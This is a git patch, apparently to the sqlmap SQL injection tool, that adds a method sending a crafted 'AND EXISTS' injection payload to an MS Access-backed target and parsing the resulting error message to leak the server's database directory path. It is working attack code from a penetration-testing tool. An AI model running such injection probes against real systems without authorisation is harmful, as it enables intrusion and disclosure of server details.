From 6ad8bbfc8e5559c43cb9c558acb45b85ee6799c9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 2 Nov 2010 10:50:57 +0000
Subject: [PATCH] one more ms access update

---
 plugins/dbms/access/fingerprint.py | 32 ++++++++++++++++++++++++++++--
 1 file changed, 30 insertions(+), 2 deletions(-)

diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 1e7ab3a3e..0f959dc0e 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
 from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.common import wasLastRequestError
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
                 payload = agent.payload(newValue=query)
                 result  = Request.queryPage(payload)
                 retVal = "not sandboxed" if result else "sandboxed"
-        
+
         return retVal
 
     def __sysTablesCheck(self):
         infoMsg = "executing system table(s) existance fingerprint"
         logger.info(infoMsg)
-        
+
         # Microsoft Access table reference updated on 01/2010
         sysTables = { 
                         "97":           ("MSysModules2", "MSysAccessObjects"),
@@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
 
         return None
 
+    def __getDatabaseDir(self):
+        retVal = None
+
+        infoMsg = "searching for database directory"
+        logger.info(infoMsg)
+
+        randInt = randomInt()
+        randStr = randomStr()
+        query   = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
+        query   = agent.postfixQuery(query)
+        payload = agent.payload(newValue=query)
+        page  = Request.queryPage(payload, content=True)
+
+        if wasLastRequestError():
+            match = re.search("Could not find file\s+'([^']+?)'", page[0])
+
+            if match:
+                retVal = match.group(1).rstrip("%s.mdb" % randStr)
+
+                if retVal.endswith('\\'):
+                    retVal = retVal[:-1]
+
+        return retVal
+
     def getFingerprint(self):
         value  = ""
         wsOsFp = formatFingerprint("web server", kb.headersFp)
@@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
         if htmlErrorFp:
             value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
 
+        value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
+
         return value
 
     def checkDbms(self):